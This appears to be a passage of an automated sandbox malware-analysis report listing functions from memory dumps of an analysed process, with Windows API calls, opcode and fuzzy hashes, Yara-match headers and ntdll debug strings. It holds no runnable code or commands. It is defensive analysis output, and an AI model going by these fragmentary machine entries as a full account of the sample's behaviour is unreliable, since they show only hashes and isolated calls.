                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00E09445
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                        • Opcode ID: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                                                                                                                                        • Instruction ID: dcc3579e211016ce4681523abbf837ef703bd1ff9138a9a8e52e986a85fcd912
                                                                                                                                        • Opcode Fuzzy Hash: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                                                                                                                                        • Instruction Fuzzy Hash: 8FF06D7338461476E22065A9AC02FDBB38CDB81B61F140069F71DFB1C1D996B88186E9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00E09445
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                        • Opcode ID: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                                                                                                                                        • Instruction ID: 4b9462e3ff4fafef2ff6b13c36e82a94b9746126ca67da2c45fddee533cd7166
                                                                                                                                        • Opcode Fuzzy Hash: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                                                                                                                                        • Instruction Fuzzy Hash: C0F06D7268071076E23066A89C03FEB639C9B81760F140029F71DBB1D1C996788186A8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00E113F9,?,?,00E113F9,GD,?,?,00E113F9,GD,00001000,?,?,00E2997D), ref: 00E280FF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                        • Instruction ID: f925f710512c5a8c88325be76b2cfa59511f9bb27af77f9b6efbc0e3b84cc4a7
                                                                                                                                        • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                        • Instruction Fuzzy Hash: 90E06572600228BFD614EE98DC41EAB37ACEF89720F004018F908A7242CA70B8108BB9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CA62C1D6,00000007,00000000,00000004,00000000,00E13ABA,000000F4,?,?,?,?,?), ref: 00E2814C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                        • Instruction ID: 4c264e31597c69e15d17644c35bbbde873544d9d812366b37e9166f39493ceb7
                                                                                                                                        • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                        • Instruction Fuzzy Hash: C7E06572600228BFD610EE98DC41EAB33ACEF89750F404018F909A7242C670B8108BB9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 00E17B3C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                                                                                                                                        • Instruction ID: f6e5703937d59ceb4e678be52f1630f5d58361b82b64cf0379ecf6461e8e45d1
                                                                                                                                        • Opcode Fuzzy Hash: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                                                                                                                                        • Instruction Fuzzy Hash: B0E0207124C20427F7206978DC45FA6335CC74CB24F141550B95EEB1C1D639F9C14150
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E116F0,gk,GD,?), ref: 00E17953
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                                                                                                                                        • Instruction ID: f54e1d94b571f63f866b67e95419a38c46c39fd1a06958d9fd832b13e087637f
                                                                                                                                        • Opcode Fuzzy Hash: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                                                                                                                                        • Instruction Fuzzy Hash: 6CD05EB17883043BF600A6F49C07F5632CC5B40B54F0640A4BA9CFB2C2E966F58085B9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 29ddae7f0beaf59aeab341e7dcfa0510a021c0ed244527872dc7dafddc3ad840
                                                                                                                                        • Instruction ID: 66acf56e27cc8df686bcfc7594682e4418ba3b6e9a5ee96fa59000676e56da1e
                                                                                                                                        • Opcode Fuzzy Hash: 29ddae7f0beaf59aeab341e7dcfa0510a021c0ed244527872dc7dafddc3ad840
                                                                                                                                        • Instruction Fuzzy Hash: 37B02B318014C4C5DA10F76007087173A00A7C0301F19C061D2030341F0339C0C0E271
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                        • Instruction ID: 645cb1d6be8b446ff41c8f05d2703c48a464bf94ff7a875658a9fae8ba1ae3b5
                                                                                                                                        • Opcode Fuzzy Hash: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                        • Instruction Fuzzy Hash: 8DC08C13F6950A0011143CE938030B0F368D0830B9E4871BB9A08F7011640ACC1006C8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: b1953af325950fb610d77ebc18d638faab752b1bf3baaffe328e1932ae66ecdf
                                                                                                                                        • Instruction ID: f84850d0c8bd38898f2d6c7c37c1bd63e8f993020296f3d730db279fa5332643
                                                                                                                                        • Opcode Fuzzy Hash: b1953af325950fb610d77ebc18d638faab752b1bf3baaffe328e1932ae66ecdf
                                                                                                                                        • Instruction Fuzzy Hash: 8C51E7B6B00256BFCB10DF99C9A09BEF7F8BB092407148669E469D7741D334DE848BE4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036E46FC
                                                                                                                                        • Execute=1, xrefs: 036E4713
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036E4742
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 036E4787
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036E4725
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036E4655
                                                                                                                                        • ExecuteOptions, xrefs: 036E46A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036E02E7
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036E02BD
                                                                                                                                        • RTL: Re-Waiting, xrefs: 036E031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036E7B7F
                                                                                                                                        • RTL: Resource at %p, xrefs: 036E7B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 036E7BAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036E728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 036E72A3
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036E7294
                                                                                                                                        • RTL: Re-Waiting, xrefs: 036E72C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%